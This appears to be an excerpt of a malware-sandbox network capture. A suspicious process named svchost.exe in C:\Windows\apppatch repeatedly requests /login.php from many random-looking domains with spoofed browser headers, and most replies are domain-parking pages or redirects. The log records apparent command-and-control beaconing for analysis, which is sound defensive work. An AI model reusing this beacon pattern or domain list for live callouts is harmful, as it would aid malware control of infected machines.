                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:32 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=9e098e457d8bc47cb3cc9dafa314bbb2|66.23.206.109|1731346412|1731346412|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              33192.168.2.850106199.59.243.227807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.991054058 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vojyqem.com
                                                                                                                                                                                                              Cookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.420396090 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:33 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1094
                                                                                                                                                                                                              x-request-id: 3b21829d-aacc-4764-8882-d2072c1f0f77
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                              set-cookie: parking_session=b5c85606-7b7e-4cde-a75c-fbd25dd3c807; expires=Mon, 11 Nov 2024 17:48:34 GMT
                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.421566963 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                              Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjVjODU2MDYtN2I3ZS00Y2RlLWE3NWMtZmJkMjVkZDNjODA3IiwicGFnZV90aW1lIjoxNzMxMzQ2NDE0LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              34192.168.2.850107162.255.119.102807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.991657972 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyqah.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.541893959 CET303INHTTP/1.1 302 Found
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                              X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                              Server: namecheap-nginx
                                                                                                                                                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                              Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              35192.168.2.850108178.162.217.107807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:33.993046999 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              36192.168.2.85010975.2.71.199807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.076081038 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: puzylyp.com
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.503537893 CET166INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Location: https://puzylyp.com/login.php
                                                                                                                                                                                                              Server: Caddy
                                                                                                                                                                                                              Date: Mon, 11 Nov 2024 17:33:34 GMT
                                                                                                                                                                                                              Content-Length: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              37192.168.2.850110178.162.217.107807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:34.845693111 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyfus.com


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              38192.168.2.85011391.195.240.19807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:35.422492027 CET271OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: www.gahyqah.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.066370964 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:35 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                              last-modified: Mon, 11 Nov 2024 17:33:35 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-7596689c44-4sqbl
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.066437006 CET212INData Raw: 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c
                                                                                                                                                                                                              Data Ascii: eneral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link15D8 rel="icon" type="image/png" href="//img.sed
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.066514015 CET1236INData Raw: 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 37
                                                                                                                                                                                                              Data Ascii: oparking.com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.066860914 CET1236INData Raw: 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f
                                                                                                                                                                                                              Data Ascii: none}button,html [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.066879988 CET1236INData Raw: 6e 65 72 2d 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72
                                                                                                                                                                                                              Data Ascii: ner-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.067518950 CET636INData Raw: 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 61 63 74 2d 75 73 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61
                                                                                                                                                                                                              Data Ascii: 9494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10px;color:#949494}.container-privacyPolicy{text-align:center}.c
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.067533016 CET1236INData Raw: 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 6d 61 72 67 69 6e 3a 30 20 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61
                                                                                                                                                                                                              Data Ascii: e-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message__content-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-hea
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.067543983 CET212INData Raw: 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 20 32 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 70
                                                                                                                                                                                                              Data Ascii: order-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font-size:x-large}.btn--su
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.067975998 CET1236INData Raw: 63 63 65 73 73 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c
                                                                                                                                                                                                              Data Ascii: ccess:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.067989111 CET1236INData Raw: 68 5f 5f 73 6c 69 64 65 72 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 23 30 30 37 62 66 66 7d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 2b 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 2d 77 65 62 6b 69 74 2d
                                                                                                                                                                                                              Data Ascii: h__slider{box-shadow:0 0 1px #007bff}input:checked+.switch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Gr
                                                                                                                                                                                                              Nov 11, 2024 18:33:36.071363926 CET1236INData Raw: 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2d 63 75 72 76 65 64 2e 70 6e 67 22 29 20 23 30 65 31 36 32 65 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39
                                                                                                                                                                                                              Data Ascii: m/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.co


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              39192.168.2.850117103.224.212.210807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:43.908159971 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lyxynyx.com
                                                                                                                                                                                                              Cookie: __tad=1731346399.2937263
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.359770060 CET244INHTTP/1.1 302 Found
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:44 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0433-4491-9018-901015a08e06
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              40192.168.2.850118103.224.182.252807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.198679924 CET277OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: vofycot.com
                                                                                                                                                                                                              Cookie: __tad=1731346399.8350699
                                                                                                                                                                                                              Nov 11, 2024 18:33:44.759839058 CET242INHTTP/1.1 302 Found
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:44 GMT
                                                                                                                                                                                                              server: Apache
                                                                                                                                                                                                              location: http://ww16.vofycot.com/login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086
                                                                                                                                                                                                              content-length: 2
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                              Data Raw: 0a 0a
                                                                                                                                                                                                              Data Ascii:


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              41192.168.2.850121199.59.243.227807652C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:46.979023933 CET404OUTGET /login.php?subid1=20241112-0433-4491-9018-901015a08e06 HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww25.lyxynyx.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1731346399.2937263; parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.403422117 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Mon, 11 Nov 2024 17:33:46 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1230
                                                                                                                                                                                                              x-request-id: 6290040b-748e-43d2-8b27-34b3bf238418
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IG3B1PdxgkdvQiK6ZwVYhCa4fM6pkNzV3yeaPyZ97Kpsqmp41p2g/fVzcHP7llNRpulLq8NmAB3I3kltzWv8SA==
                                                                                                                                                                                                              set-cookie: parking_session=41dc0dcd-166b-4eb6-a959-38d5d6625e06; expires=Mon, 11 Nov 2024 17:48:47 GMT
                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 47 33 42 31 50 64 78 67 6b 64 76 51 69 4b 36 5a 77 56 59 68 43 61 34 66 4d 36 70 6b 4e 7a 56 33 79 65 61 50 79 5a 39 37 4b 70 73 71 6d 70 34 31 70 32 67 2f 66 56 7a 63 48 50 37 6c 6c 4e 52 70 75 6c 4c 71 38 4e 6d 41 42 33 49 33 6b 6c 74 7a 57 76 38 53 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_IG3B1PdxgkdvQiK6ZwVYhCa4fM6pkNzV3yeaPyZ97Kpsqmp41p2g/fVzcHP7llNRpulLq8NmAB3I3kltzWv8SA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                              Nov 11, 2024 18:33:47.403551102 CET656INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                              Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDFkYzBkY2QtMTY2Yi00ZWI2LWE5NTktMzhkNWQ2NjI1ZTA2IiwicGFnZV90aW1lIjoxNzMxMzQ2NDI3LCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              42192.168.2.85012264.190.63.13680
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Nov 11, 2024 18:33:46.979320049 CET348OUTGET /login.php?sub1=20241112-0433-44f6-9e59-dc72adbb0086 HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
